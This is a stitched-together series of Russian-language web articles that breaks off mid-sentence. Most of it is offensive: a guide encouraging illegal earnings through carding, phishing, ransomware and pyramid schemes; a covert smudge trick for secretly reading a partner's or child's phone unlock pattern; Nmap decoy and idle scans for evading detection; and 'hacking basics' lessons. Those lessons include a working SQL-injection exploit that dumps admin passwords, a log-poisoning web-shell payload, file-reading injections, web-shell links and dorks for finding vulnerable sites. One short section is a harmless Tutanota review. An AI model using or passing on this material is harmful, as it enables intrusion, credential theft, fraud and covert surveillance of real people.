Интегрированные службы цифровых сетей ISDN пред­назначены для комбинированной передачи голоса и данных через цифровые телефонные линии и специальные ISDN-модемы. ISDN описывает взаимодействие на физическом, канальном и сетевом уровнях и использует мультиплексирование с разделени­ем времени (TDM) для преобразования аналоговых сигналов в цифровые. ATM. Технология асинхронной передачи ATM использует протокол коммутации пакетов, который пересылает данные в ло­кальных и глобальных сетях фрагментами (cells) по 53 байта со скоростью до 622 Мбит/с. Стеки протоколов Как уже упомина­лось, многие разработчики не следуют точно стеку протоколов OSI. Они применяют свои стеки протоколов, близко напоминающие модель OSI и совместимые с ней. Напрямую могут «общаться» только сети одних протоколов. TCP/IP (Transmission Control Protocol/Internet Protocol) был од­ним из первых стеков сетевых протоколов. IP-составляющая обеспечивает одно из лучших на сегодня определений межсетевой связи и при­меняется многими разработчиками в качестве метода взаимодей­ствия продуктов в ЛВС и ГВС. Протоколы NetBEUI/NetBIOS фирмы Microsoft представляют собой транспортный и сетевой протоколы, не поддерживающие маршрутизацию. Обладают хорошими временными характеристиками, защитой от ошибок, легко реализуются. Протокол NetWare SPX/IPX — это «родной» протокол фирмы Novell для сетей NetWare, который сейчас практически не используется. Протоколы AppleTalk были определены фирмой Apple Computer в качестве способа взаимодействия систем Apple Macintosh. Сетевое оборудование Одна из самых распространенных на данный момент в мире сетей это Ethernet? Который позволяет достичь наивысшего КПД пропускной способности канала 93%. Для построения сетей этого типа используется неэкранированная (UTP) и экранированная (STP) «витая пара», коаксиал и оптоволокно. Самой дешевой и быстрой в построении сети считается «витая пара». Но эта среда передачи имеет значительное ограничение максимальная длина сегмента 100-150 м. Но протоколы сетевого уровня позволяют соединить несколько сегментов через повторители, мосты, коммутаторы и маршрутизаторы. Количество сегментов должно быть не больше пяти. Повторитель усиливает сигнал сетевого кабеля, который затухает на расстоянии более 100 м. Он работает на физическом уровне стека протоколов, не требует программного обеспечения и представляет собой обычно автономное устройство, не дающее непроизводительных издержек при передаче данных. Таким образом, с помощью наращивания сегментов общая протяженность сети может достигать 500 м. Компьютеры, связанные повторителем считаются принадлежащими одному сегменту. Количество компьютеров в сегменте не должно превышать 50. Мост — это устройство уровня связи данных, объединяющее две или более сети с одной или разной топологией. Обычно это компьютер с несколькими сетевыми платами, к каждой из которых подсоединен свой сегмент ЛВС. Основной задачей моста служит обеспечение прозрачной связи между абонентами различных сетей, то есть трансляция и фильтрация MAC-кадров. Происходит это с помощью преобразования протоколов уровня MAC с адресами целевой рабочей станции. Трафик между локальными сетями не фильтруется, поэтому при сильном трафике возможны некоторые потери в производительности. Подключение к мостам про­исходит через порты. При передаче информационных кадров мост считается неадресуемым, но при изменении активной конфигурации мосты обмениваются управляющими кадрами и в качестве адреса получателя в каждом мосту выделяется адрес одного-единственного порта, который считается управляющим. В настоящее время многие функции мостов реализуются маршрутизаторами, которые предлагают дополнительные средства функции маршрутизации. В последние несколько лет цены на маршрутизаторы неуклонно снижаются, и это делает их лучшим вариантом объединения ЛВС. Основной функцией любого моста является ограничение пото­ка данных между сегментами сети, поэтому так важно правильно размещать их. Для этого используется правило 80/20, в соответст­вии с которым не менее 80 % трафика данных должны быть ло­кальными, не более 20 % — внешними. Если указанное соотноше­ние не выполняется, то использование мостов становится неэф­фективным. Если в существующей конфигурации сети невозможно удовле­творить требованию 80/20, то следует перенести часть системы из одного сегмента в другой. Коммутаторы (коммутирующие концентраторы, switches) — сочетают в себе функции многопортового повторителя и высоко­скоростного моста. Их упрощенной «неинтеллектуальной» версией исполнения являются концентраторы (хабы), которые просто на физическом уровне соединяют сегменты сети «звездой» и рассылают все пакеты на все порты. Коммутатор (свич), работая как на канальном, так и на сетевом уровне, же создает таблицу МАС-адресов всех устройств, подключенных к его портам, и использует ее для передачи паке­тов только в требуемый порт. Наибольшее распространение получили свичи с пропу­скной способностью 100 Мбит/с. Иногда встречаются комму­таторы, имеющие порты обоих типов. Производятся коммутато­ры, работающие с разными МАС-протоколами, например Ethernet и FDDI. Маршрутизатор требует более высокого уровня протоколов архитектуры связи, чем мост или коммутатор. Он связывает сегменты сети через сетевой уровень. Например, инструкции по маршрутизации пакетов содержатся в сетевом уровне IP. Маршрутизатор отличается от моста тем, что он может считывать адрес рабочей станции и адрес ЛВС в пакете. Благодаря этому маршрутизатор может фильтровать пакеты и перенаправляет их по наилучшему возможному маршруту, который определяет по таблице маршрутизации. Протоколы маршрутизации определяют метод, с помощью которого маршрутизаторы могут взаимодействовать друг с другом, совместно использовать информацию о сети. Эти протоколы могут выполняться в маршрутизаторах для построения таблиц маршрутизации или обмена информацией о маршрутизации с другим маршрутизатором. Со временем таблицы маршрутизации маршрутизирующих устройств будут содержать примерно одну и ту же информацию. Два основных протокола маршрутизации в TCP/IP это RIP и OSPF. Шлюзы обычно работают на самом высоком уровне стека протоколов и обеспечивают взаимодействие систем и сетей, которые используют несовместимые протоколы. Примерами межсистемных продуктов являются пакет электронной почты. Они позволяют обмениваться почтовыми файлами пользователей на самых различных системах. Это примерно тот набор элементов, которым приходится оперировать, чтобы создать самую простейшую сеть, хотя у себя дома. Понимая, что делает каждый из выше перечисленных участников конгломерата, все сетевые настройки в ОС становятся более или менее очевидны. Так что вперед, за создание своих сетей, пусть для начала маленьких, но собственных!
  18. Нелегальный заработок вне сети интернет Чтобы заработать нелегальным путем вне сети интернет, необходимо обладать властью, т. е. стать депутатом или чиновником. Заработная плата у этих слоев населения довольно значительная, но все же ее недостаточно для приобретения всех тех благ, которыми обладают на сегодняшний день депутаты: дорогие автомобили, роскошные особняки и загородные виллы, недвижимость, сдаваемая в аренду и т. д. Откуда берутся такие суммы доходов? Из нелегальных доходов. Коррумпированные отрасли труда в России Способы нелегального заработка тщательно скрываются от общественности. Схемы нелегального заработка чиновников базируются на их служебном положении, поскольку они ответственны за принятие определенных (важных) решений в нашей стране в рамках их полномочий. Зарабатывают нелегально также с помощью азартных игр и путем ведения преступной деятельности. Азартные игры – это быстрый нелегальный заработок, однако такие варианты нелегального заработка довольно рискованны и, как правило, участвующие в такой деятельности люди не успевают насладиться заработанными деньгами. Нелегальный заработок в интернете Менее рискованными являются на сегодняшний день нелегальные варианты заработка с помощью интернета. Работа в интернете может быть основной или дополнительной. Все зависит от наличия свободного времени и желания зарабатывать. Доход от работы в сети интернет выплачивается виртуальными денежными средствами, которые впоследствии выводятся на банковскую пластиковую карту и обналичиваются. В нашей стране на данном этапе не существует законодательства, которое облагало бы виртуальные деньги налогами, поэтому в интернете обращаются довольно крупные денежные суммы. Нелегальные способы заработка в интернете: Реализация несуществующего товара: цифровых наркотиков 1. Реализация несуществующего товара. К этому виду заработка относится продажа звуковых наркотиков, телефонов рентгенов и т. п. На такие товары существует спрос, а всем известно, что спрос рождает предложение. Несуществующие товары подробно описываются, рекламируются, создаются фиктивные отзывы людей, которые уже пользовались данными товарами. 2. Интернет-вымогательство. Вымогательство базируется на недостаточной компьютерной грамотности большинства людей. Работа компьютера рядового пользователя попросту блокируется. На экране высвечивается баннер, из которого можно почерпнуть информацию о дальнейших действиях. Владельцу компьютера рекомендуют перечислить определенную сумму на указанные в баннере реквизиты. За перечисление средств высылается, как правило, код деактивации блокирующей программы. На таких баннерах в наше время зарабатывают миллионы. 3. Вымогательство с помощью зашифровки пользовательских данных специальным вирусом. За расшифровку требуют определенную денежную сумму. 4. Продажа ключей и crack для взлома лицензионного программного обеспечения. 5. Продажа личных данных пользователей, в частности: паролей, логинов, счетов банковских карт, пин-кодов, данных кредитных карт и т. д. 6. Еще один нелегальный заработок в интернете - продажа компьютерных вирусов, а также их разработка и переупаковка. Схема сдачи botnet в аренду 7. Продажа пиратского программного обеспечения и ворованных электронных документов. 8. Создание, распространение, продажа сайтов порнографического содержания в сети интернет. 9. Взлом под заказ серверов. 10. Уничтожение данных конкретных пользователей. 11. Взлом почтовых ящиков и спам-реклама. 12. Сдача botnet в аренду, создание таких «зомби» сетей. Из всех вышеперечисленных способов нелегального заработка самым распространенным является кардинг. В результате кардинга выполняется операция с банковской картой или ее реквизитами, естественно, без подтверждения, а также инициализации ее законного владельца. Реквизиты банковских карт могут извлекаться из взломанных серверов онлайн-магазинов, из любой платежной системы или непосредственного с персонального компьютера с помощью специальных программ удаленного доступа (трояна или червя). Наиболее часто используемый вариант воровства номера чужой пластиковой карты называется «фишинг». Для этого вида нелегального заработка создается сайт, который внешне копирует пользующийся у пользователей особым доверием ресурс. Например, это может быть копия сайта всем известного банка и т. п. Через такой сайт и перенимаются реквизиты пластиковой карты пользователя. Фишинг - воровство номера чужой пластиковой карты Быстрый нелегальный заработок: важные детали Для того чтобы нелегальный заработок в интернете довольно быстро начал приносить свои плоды, необходимо создавать сразу несколько систем. Специфика нелегального заработка состоит в том, что каждый из его вариантов всегда находится на грани разоблачения, поэтому для стабильного заработка необходимо страховаться несколькими работающими схемами одновременно. Рассмотрим несколько примеров таких схем: 1. Сайт-однодневка. Создается сайт, состоящий всего из 2-3 страниц. На страницах такого сайта пишется завлекающий текст, способный убедить посетителя в заработке крупных денежных сумм путем перечисления некоторой суммы на счет создателя сайта. Реальный пример - «золотые кошельки». Несмотря на сомнительность подобной схемы, народ верит, и создатели таких сайтов очень прилично зарабатывают и по сей день. 2. Нелегальные продажи. Всем должна быть знакома схема заработка на реферальных ссылках. Существуют проекты с возможностью заработка на кликах с привлечением при этом рефералов. Таких работников желают приобрести и другие пользователи. Высокий уровень активности по рефералу докупают за хорошую цену. Можно довести уровень активности реферала «специально». В этом состоит вся нелегальность таких продаж. 3. Предложение по созданию сайтов, написанию статей, продвижению проектов. Хорошо разрекламировать свою услугу так называемого "опытного специалиста", взять с клиента максимально, а выполнить работу минимально. Результат работы, например, услуги по продвижению сайтов будет виден не сразу, а только через 2-3 месяца, а средства получите сразу. Статистика DDoS атак 4. Создание различных пирамид. Интернет-пирамиды в чем-то похожи на всем известную «МММ». Этот способ заработка остается очень прибыльным. Название пирамид изменяется, изменяется и описание сути заработка, но сама схема при более детальном рассмотрении остается прежней. Заработок нелегальными способами является высокодоходным в силу большого спроса на «быстрый капитал». Всегда найдутся люди, которые в силу неопытности в том или ином вопросе, готовы будут предоставить свои денежные средства владельцам нелегального бизнеса. Ответом на вопрос: «Как быстро заработать деньги нелегально?» является вполне работающая схема, которая обходит принципы морали и нравственности, но приносит высокий доход. Заниматься таким заработком или нет - решать нужно каждому самостоятельно. Нелегальные способы заработка часто разоблачаются и необходимо придумывать что-то новое на основе старой схемы. Если вы обладаете креативным мышлением, готовы рискнуть, то почему бы и нет?
  19. Никому не нравится, если кто-то пытается вмешиваться в его личную жизнь. Для того чтобы вы чувствовали себя в безопасности на просторах интернета была создана безопасная почта Tutanota. Используя этот сервис, вы можете быть уверены, что все ваши послания и контакты автоматически шифруются, делая переписку защищенной от вмешательства посторонних. Кстати, для тех кто у нас в первый раз, могу предложить обратить внимание на статью «Защищенная почта ProtonMail», в которой мы обозревали главного конкурента безопасной почты Tutanota. Безопасная почта Tutanota Содержание Предисловие Безопасность Регистрация Использование Оценка Безопасность сервиса Tutanota Начнем с того, что сервера находятся в Германии. Безопасная почта имеет открытый исходный код, поэтому любой, кто понимает язык программирования, может просмотреть его. Шифрование и дешифрование происходит в момент идентификации (авторизации) конкретного пользователя. Для этого используется личный пароль юзера, именно поэтому, если вдруг вы его забыли, то все потерянно и восстановлению не подлежит. Вся ваша переписка зашифровывается локально, и хранится на серверах уже в шифрованном виде, а это означает, что даже владельцы Tutanota не имеют возможности прочесть ее. Интересно, что шифруются не только письма, но и тема, а также вложения, это принципиальное основное отличие Tutanota от других почтовых сервисов. Кроме того, в момент отправки электронного письма программа автоматически удаляет IP-адрес, делая вас анонимом. Регистрация в Tutanota Чтобы получить почтовый адрес на Tutanota необходимо пройти стандартную процедуру регистрации: Зайдите на страницу Tutanota и кликните на строку «Зарегистрироваться» Заполните форму регистрации. Для этого в разделе «Требуемый адрес электронной почты» вбейте придуманное имя, и вы получите адрес своей почты, например [email protected]; Заполните поле «Пароль». Используйте латинские буквы, цифры и спецсимволы, чтобы пароль был надежным; Подтвердите свой пароль в дополнительной строке; Кликните кнопку «Войти». Будьте внимательны и обязательно где-нибудь зафиксируйте свой пароль, так как если вы его забудете, восстановить доступ к почте будет невозможно. Я рекомендую менеджер паролей KeePass. Интерфейс почты достаточно простой, так что вопросов по работе с сервисом возникнуть не должно. Использование Tutanota Отправка шифрованных сообщений работает быстро, просто и результативно: Вы создаете сообщение; Сервис автоматически генерирует пароль для каждого внешнего адреса, который вы должны передать адресату; Отправив зашифрованное послание, адресат получит ссылку, которая направит его на специальный аккаунт на официальном сайте Tutanota, где ему и нужно будет ввести пароль упомянутый выше; С помощью пароля адресат получает возможность прочесть письмо, просмотреть вложение и при необходимости отправить ответ. Достоинства: Интерфейс на русском Быстрая и простая регистрация. Бесплатный тариф. Приложения для Android и iOS. Возможность развернуть сервер на своём домене. Недостатки: В бесплатной версии всего лишь 1 Гб хранилища. Не поддерживает облачных хранилищ. Не имеет двухфакторной аутентификации. Не поддерживает работу по IMAP (в плане безопасности — это плюс). В целом это довольно неплохой сервис. В чем-то лучше (открытый код) чем популярный ProtonMail, а в чем-то хуже. Я свое мнение немного придержу на отдельную статью, в которой будет сравнение всех безопасных почт.
  20. Узнать графический код телефона вы можете разными способами, все эти способы требуют не малой возни. Также они имеют один существенный недостаток, владелец телефона: жена, муж или ребенок всегда смогут узнать что кто-то копался в телефоне, так как во время процедуры снятия когда блокировки, все эти способы требуют сброса старого графического кода и установки новог Я же расскажу о самом простом и рабочем способе. С помощью этого способа вы сможете узнать код блокировки телефона не изменяя данных владельца мобильного устройства. Таким образом никто не узнает что у вас есть доступ к телефону. Данный метод настолько прост что вы прочитав эту статью подумаете лишь об одном «Как я не догадался об этом сам». Этот способ работает на всех телефонах защитное стекло которого не имеет олеофобное покрытие (95% всех телефонов не имеют такого защитного покрытия). Как узнать графический код? Для того чтобы узнать код блокировки нам понадобится: Сам телефон, смартфон, планшет. Любая тряпочка. Салфетка или туалетная бумага без узора. Что-то оставляющее равномерное жирное пятно: растительное или подсолнечное масло, блеск для волос и т.д. Теперь нам необходимо остаться наедине с телефоном, планшетом. Сухой тряпкой очищаем экран телефона от пыли. Смачиваем тряпку в чем-то жирном и максимально выжимаем. Протираем экран телефона жирной тряпкой. Салфеткой или микрофибровой тряпочкой протираем экран оставляя равномерный слой жира на всем экране телефона. Постарайтесь это сделать так чтоб выглядело естественно. Телефон готов. Отложите его в сторону. Теперь задействуя социальную инженерию или просто смекалку необходимо сделать так, чтоб человек разблокировал телефон а потом оставил вас с ним еще раз наедине. Сделать это не трудно. После этого подойдите к окну или другому источнику света. Посмотрев на экран телефона под определенным углом, вы увидите графический код блокировки телефона. Выглядеть это будет так: Как узнать код блокировки телефона Так, по следам пальца человека, можно узнать не только графический код блокировки, но и цифровой, но это конечно посложнее. Нужен бесплатный Wi-Fi? Читай статью «Вайфай халява или как узнать пароль WiFi без влома и хакерства»! Для тех же кто для защиты телефона или планшета использует графический код, эта статья должна быть ответом на вопрос «Стоит ли использовать графический код блокировки»
  21. Увеличение задержки между пробами портов — не единственный способ скрыть, что машина сканируется. Еще один интересный метод — одновременно запустить несколько потоков сканирования, подменяя обратный IP-адрес во всех случаях, кроме одного. Вас может заинтересовать стать «Обход фаервола и IDS в Nmap». Скрытое сканирование Nmap Смысл здесь в том, чтобы запутать IDS и администратора машины. В логах IDS окажется сразу несколько попыток сканирования с разных адресов, среди которых будет только один настоящий. Использовать такой метод довольно просто: $ sudo nmap -D адрес1,адрес2,адрес3 192.168.0.1 Вы можете указать сколько угодно фиктивных адресов или позволить Nmap сгeнерировать рандомные адреса за тебя (в данном случае десять адреcов): $ sudo nmap -D RND:10 192.168.0.1 Однако тут необходимо иметь в виду, что случайные адреса часто будут указывать на нeсуществующие или отключенные машины. IDS и хороший админ смогут отсеять их, чтобы вычислить реальный адрес. Более сложный способ — организовать так называемое Idle-сканирование. Это очень интересная техника, которая базируется на трех простых фактах: При выполнении SYN-сканирования удаленная сторона посылает пакет SYN/ACK в случае, если порт открыт, и пакет RST, если нет. Машина, получившая незапрошенный пакет SYN/ACK, должна отвечать пакетом RST, а при получении незапрошенного RST — игнорировать его. Каждый IP-пакет, отправленный машиной, имеет IPID, а многие ОС при отправке пакета просто увеличивают IPID. Сама техника заключается в том, чтобы найти неактивную сетевую машину, которая просто ничего не делает (Idle), но при этом находится в рабочем состоянии и способна отвечать на сетевые запросы. Более того, машина должна работать на древней ОС, которая увеличивает IPID пакетов вместо рандомизации, как современные ОС. Сделать это можно с помощью все тех же флагов -O -v Nmap (строка IP ID Sequence Generation в выводе) либо с помощью Metasploit Framework (это удобнее и быстрее): > use auxiliary/scanner/ip/ipidseq > set RHOSTS 192.168.0.1-192.168.0.255 > run Далее вы запускаете сканирование портов: $ sudo nmap -sI IP-Idle-машины 192.168.0.1 На каждую пробу порта Nmap сначала будет посылать запрос Idle-машине, записывать IPID пакета, затем посылать SYN-пакет жертве, подменяя обратный адрес на IP Idle-машины, затем снова посылать запрос Idle-машине и сверять IPID с ранее сохраненным. Если IPID увеличился со времени прошлой проверки, значит, машина посылала пакеты, а, как мы знаем из второго пункта выше, это означает, что она ответила пакeтом RST. Это, в свою очередь, говорит, что проверяемый порт жертвы открыт. Если IPID не увеличился, значит, порт закрыт.</p>
  22. Здравствуйте уважаемые посетители портала. Вы читаете 4 урок из серии «Основы хакерства». А вот что мы сегодня разберем: Методы определения версии движка сайта/форума ReversIP и полезные инструменты. Разбираем сплоит. Более углубленное знакомство с SQL injection php include Прогулка по багтракам. Методы определения версии движка Вообще при анализе сайта, нужно сразу смотреть есть ли там паблик скрипты(т.е. не самописные) Что бы найти и использовать эксплоит, нужно как минимум узнать имя и версию CMS, форума или каких либо других скриптов расположенных на сайте (фотогаллереи, новостные ленты и т.п.). Бывает, что данные крутятся в подвале сайта. Но обычно от туда их убирают. Гораздо более эффективный вариант это посмотреть исходный код страницы. Для танкистов: что бы просмотреть исходник страницы нужно нажать на правую кнопку мыши и выбрать «Исходный код страницы», или что то вроде того (в зависимости от браузера). Итак, в исходнике сначала смотрим на текст заключенные в комментарии ([!-- --]) Как думаю понятно, это текст на странице не отображается. Там как раз могут быть указаны имя версия CMS, иногда можно найти мы администрации и прочие вкусности. В исходнике также можно найти ссылки на каскадные листы стилей (.css). В них иногда тоже можно кое-что найти. Да, еще можно преднамеренно вызвать ошибку. Т.е. попробовать открыть несуществующую папку на сайте (что-то типа www.site.us/gone/), вполне возможно, что сайт выплюнет полезную инфу. Ну думаю тут ясно. Теперь поговорим о форумах: Обычно, что за форум определить несложно. Сложнее узнать версию. В phpbb например есть очень интересный файлик — CHANGELOG.html Его, возможно обнаружить по пути <br><br> forum/docs/CHANGELOG.html Там можно обнаружить надпись вроде <br><br> phpBB x.x.x Changelog В IPB 1.3 присутствуют файлы ssi.php show.php В В 2.0.* <br> /sources/help.php <br> /sources/usercp.php<br> В 2.1.*<br> /ips_kernel/PEAR/ Ну и к тому же опять же нужно смотреть на исходный код и на ошибки. Кстати, еще стоит сказать, что доверять баннерам в подвале не стоит. Умный администратор поставить фальшивую подпись. Reverse IP и полезные инструменты. Бывает, что сайт написан на чистом HTML без применения скриптов. Казалось бы, взломать его почти невозможно. Но это не так. Выход-Reverse IP. Суть этой атаки в том, что бы взломать сайт, который хостится на одном сервере с целевым сайтом (если такой имеется). Либо наша цель получить root(права администратора) на сервере. Тогда мы ищем, какие сайты хостятся на сервере и пытаемся взломать один из них. Ну думаю, суть понятна. Другое дело как узнать какие сайты присутствует на сервере. Для этого мы будем использовать сканнеры. Например, я пользуюсь вот этим онлайн сканером от madnet a madnet.name/tools/madss/ Так же он составляет примерную структуру сайта. Вот еще неплохой security-digger.org/ Тоже присутствует возможность составлять структуру директорий сайта, а также reverse ip. Допустим, забиваем адрес www.job.ru Сканер выдает нам соседние сайты. Если речь пошла про онлайн тулзы приведу еще одну: x3k.ru/ Здесь есть куча всяких кодировщиков и декодеровщиков (пригодиться нам при инъекциях), так же есть сканер портов Reverse IP whois сервис и еще несколько. Кстати, если вы пользуетесь браузером firefox, то можете установить плагин Reverse IP А плагин LiveHTTPHeaders поможет редактировать HTTP заголовки. Разбираем сплоит. Для тестирования желательно иметь в наличии интерпретатор php. Кажется, на 2 уроке я советовал поставить тебе mysql+apache+php. Если ты уже поставил это и у тебя все работает стабильно то ок. Если не ставил, советую установить Denwer Процесс установки прост до безобразия. В состав входит все, что нам нужно. Тем более на следующем уроке я хотел бы показать анализ одной CMS, так что Денвер просто необходим. Мудрить не будем, и возьмем простой сплоит для Sniggabo CMS: <br><br> Sniggabo-expl.php<br> 14 июня, 2009<br> <?php<br> print_r('<br><br> ################################################<br><br> Sniggabo CMS - Remote SQL Injection Exploit<br><br> Date: 11.06.2009<br> Vulnerability discovered by: Lidloses_Auge<br> Exploit coded by: Lidloses_Auge<br> Homepage: http://www.novusec.com<br> Greetz to: -=Player=- , Suicide, enco,<br> Palme, GPM, karamble, Free-Hack<br><br> Admin Panel: [target]/admin/login.php<br> Dork: "powered by Sniggabo CMS" inurl:article.php?id<br> Use: php '.$argv[0].' http://www.site.com<...ite.com<br><br> ################################################<br> <br> ');<br> $url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)</br>+from+users--";<br> $src = file_get_contents($url);<br> $data = split("::",$src);<br> echo "Admin: $data[1]nPassword: $data[2]n";<br> ?> Во-первых обратим внимания на эту строку: Use: php '.$argv[0].' www.site.com В ней показано, как нужно использовать этот эксплоит. Как видишь запускать его нужно из командно строки. В качестве параметра передаем сайт. Далее сам код: В 1 2 3 строке мы составляем url $argv[1] сайт, который мы передали в качестве параметра. <br> /article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--" ; — собственно сам процесс получения логина и пароля. Далее <br> $src = file_get_contents($url); Обращаемся по составленному адресу и записываем результат в переменную $src <br> $data = split("::",$src); Разделяем полученный результат по ключевой строке :: <br> echo "Admin: $data[1]nPassword: $data[2]n"; Выводим. Если мы будем раскручивать уязвимость вручную, то результат будет таким: Login::password В сплоите как раз по строке :: мы делим результат. В переменной первый элемент будет login а второй password. Local PHP include и выполнение произвольного кода. Сейчас мы поговорим, как через локальный инклуд мы сможем выполнить произвольный код. Как ты помнишь с помощью этой уязвимости мы можем читать файлы на сервер. Так вот, значит мы сможем прочитать логи веб сервера. В логах сохраняются все запросы. Нас интересуют httpd-access.log и httpd-error.log. Суть в то, что бы подделать HTTP заголовок записан в поле User-Agent (например) php код. Далее это код запишется в логи, а логии мы можем загружать. Вот тебе и выполнение кода. Во-первых как подделывать заголовки. Выше я приводил удобный плагин LiveHTTPHeaders. Если вы не пользуетесь Фоксом можно скачать программу InetCrack. Итак, давайте попробуем забить в поле Referer такой код: <br><br> <? passthru($_GET['cmd']);?> Все код записан в httpd-access.log. Теперь нужно с помощью инклуда подгрузить его. Тут придется перебирать пути до логов. Вот стандартные forum.hackzona.ru/forum-f8/thread-t13002.html Ну допустим путь оказался таким: <br><br> ../../../../../../etc/apache2/httpd.conf www.include.us/index.php?page= ../../../../../../etc/apache2/httpd.conf&cmd=ls И мы получим листинг файлов текущей директории (ls). Только учти, выполняется только тот код, который стоит первым в логах. Т.е. у нас будет только одна попытка, а потом по новой. SQL injection. Особенности 5 версии mysql Что такое magic quotes Как можно читать файлы с помощью инъекций. До этого мы разбирали инъекции в mysql <5 В 5 версии есть кое-какие особенности. Ну значит, с помощью команды version() мы узнали, что база данных версии 5 (or <) В ней присутствует таблица INFORMATION_SCHEMA, в ней находятся таблицы и колонки базы. Она избавит нас от ручного подбора. Реализация <br><br> www.site.us/index.php?id=1<br> www.site.us/index.php?id=1,table_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES/* <br(Читабельное поле 2) И так тут либо мы увидим все таблицы базы либо только первую. Если второе, то прочитать остальные имена можно с помощью limit: <br><br> www.site.us/index.php?id=+union+select+1,table_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES</br>+limit1,2/* Читаем 2 запись. Так, допустим нашли таблицу. Теперь смотрим поля: <br><br> www.site.us/index.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS/* Опять же просмотр конкретных записей: <br><br> www.site.us/index.php?id=+union+select+1,column_name,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+limit 1,2/* Ну и ищем поля типа password или login Теперь поговорим про магические кавычки (magic quotes) это процесс, который позволяет автоматически экранировать входные данные PHP скрипта. Если magic quotes=on (активны), то входящие одиночные и двойные кавычки, левый слеш и NULL знаки экранируются левыми слешами. Волшебные кавычки бывают: <br><br> magic_quotes_gpc проверяет запросы HTTP (GET, POST, и COOKIE) <br> magic_quotes_runtime функции, которые возвращают данные из внешних источников будут экранироваться левыми слешами.<br> magic_quotes_sybase одиночные кавычки экранируются двойными Надеюсь понятно, что если magic_quotes = on нам это очень не на руку. Скоро я расскажу, как это обходить. А теперь как можно прочитать файл с помощью инъекции. Т.е. мы получим тот же локальный php include Ну допустим, есть инъект: <br><br> www.site.us/index.php?id=+union+select+1,2,3,4,5,6,7,8,9,10/* Читабельно поле 2. Загружать файлы можно так: <br><br> www.site.us/index.php?id=+union+select+1,LOAD_FILE(/etc/passwd),4,5,6,7,8,9,10/* Прогулка по багтракам.В этом топе я решил разбирать интересные (ну вообще какие будут) уязвимости с багтраков. Вообще я часто уже говорил, что чтение багтрак лент идет только на пользу. Пожалуй приведу несколько: Русскоязычные: <br> bugtraq.ru/<br> securitylab.ru/<br> securityvulns.ru/ Остальные: <br> milw0rm.com<br> packetstormsecurity.org<br> securityfocus.com Приложение:Во-первых, как вы заметили я опустил раздел xss. На данном этапе пока не знаю что вам рассказывать, поэтому просто дам ссылку на интересную статьюhttp://forum.antichat.ru/thread8038.html Во вторых несколько ссылок на веб шеллы: <br><br> c99shellhttp://eraserevil.pp.net.ua/_ld/0/87_SiJ.txt<br> AK-74 http://stranger.nextmail.ru/userban.txt<br> r57shell http://www.securitylab.ru/software/234092.php
  23. Вступление. Здравствуйте уважаемые читатели. Мы продолжаем значиться азами веб хакинга. Это 3 урок и вот какие темы мы сегодня разберем:Сплоиты структура и использование Google hacking Более подробное изучение таких уязвимостей как: -sql injection -xss -php include Сплоиты. Или эксплоиты. Это программы или скрипты которые автоматически реализуют какую либо уязвимость. Мы будем знакомиться с эксплоитами для веб приложений. Кроме них существуют эксплоиты для прикладных программ. Они более сложные и тебе пока рановато их изучать. Итак, возьмем инъекцию из прошлого урока http://www.site.us/main.php?id=18646644+union+select+1,2,3,name,password,6,7+from+user/*<br><br> Представим, что эта уязвимость была обнаружена в какой то СMS с названием CoolCMS Что бы каждому кто хочет взломать этот движок не нужно было раскручивать sql injection самому, мы напишем эксплоит, который будет реализовывать уязвимость и выдавать только логин и пароль администратора. Приводить текст эксплоита я не буду а только разберем суть алгоритма: Сначала нужно сделать обратиться к сайту с составленным запросом для вывода логина и пароля.<br> Далее нам вернется страничка с аккаунтом<br> Теперь нужно пропарсить страницу и найти логин пароль.<br><br> Все. Ну кончено это самый примитивный пример. Но надеюсь ты понял зачем нужны эксплоиты. Алгоритм эксплоита привиденного выше можно реализовать практически на любом языке программирования. Но обычно эксплоиты для веб приложений пишутся на PHP или Perl Давайте теперь разберем классический сценарий: Твоя цель взломать какой то сайт. Зайдя на него ты видишь в подвале такую надпись: Power by PHP-nuke 8.0 Это значит сайт работает на движке найков. Теперь нужно попробовать найти паблик эксплоиты под эту версию. Можно пойти на багтрак, но я предпочитаю пользоваться поисковиком: PHP-nuke 8.0 exploit После непродолжительного парсинга ссылок мы находим сплоит: <br> http://milw0rm.com/exploits/3346<br> Видим надпись #!/usr/bin/perl Это значит эксплоит написан на perl. Далее видим это: #0day exploit for PHP-nuke <=8.0 Final 0day значит эксплоит нулевого дня. Т.е. под него еще не выпущено заплаток под эту версию. Итак, сполит на перл. Если у тебя стоит linux то запустить его можно командой Perl exploit.pl С windows посложнее. Тут придется поставить интерпретатор для языка. Но не бойся это не сложно. Скачать его можно здесь После установки можно так же воспользоваться командой perl в консоли. Perl exploit.pl Далее программа покажет необходимые аргументы для этого эксплоита. В большинстве случаев понадобится только адрес сайта. Таксс, раз разговор зашел про запуск давайте разберем как использовать php эксплоиты. Вообще желательно поставить php+apache+mysql. Т.к. это пригодится нам в будущем для тестирования движков. Apache — это сервер mysql — это база данных. Мануал по установке можно найти здесь. После этого достаточно скопировать php сплоит в папку www и запустить из браузера. localhost/exploit.php Либо в командной строке набрать php путь до сплоита В следующем уроке разберем исходник настоящего эксплоита. Google hacking. Поиск бажных сайтов Возьмем опять же уязвимость PHP-nuke 8.0. Давайте с помощью поисковика найден сайты которые построенные на основе этого движка. К этим сайтам можно применить наш сплоит. Запрос в google будет примерно таким: Site: PHP-nuke 8.0 Поисковик выдаст нам список сайтов, на которых присутствует строка: PHP-nuke 8.0. В большинстве случаев это буду сайты которые нам нужны.Потом открываем любой сайт и применяем сплоит. Надеюсь понятно, что можно искать любые бажные движки. Можно просто зайти на любой багтрак и быбрать уязвимый двиг, под который есть сплоит. И далее с помощью гугла найти сайты с этим движком. В прошлом уроке я показывал как искать ресурсы с возможным php include bug: inurl: page= inurl ищет указанную строку в адресе сайта Можно сделать такой запрос: inurl:id=1 и гугл выдаст ссылки, в которых присутствует строка id=1. Некоторые из них возможно уязвимы к sql injection. А если сделать так: inurl:page= and .us То гугл найдет все сайты с которые находятся в зоне .us(американские) Кстати, еще можно указать тип документа: filetype:asp Гугл выдаст нам найденные asp сценарии. Поиск админкиТеперь давайте разберем как гугл может помочь нам при атаке на конкретный сайт. Во первых поиск административной панели aka админки. Бывают 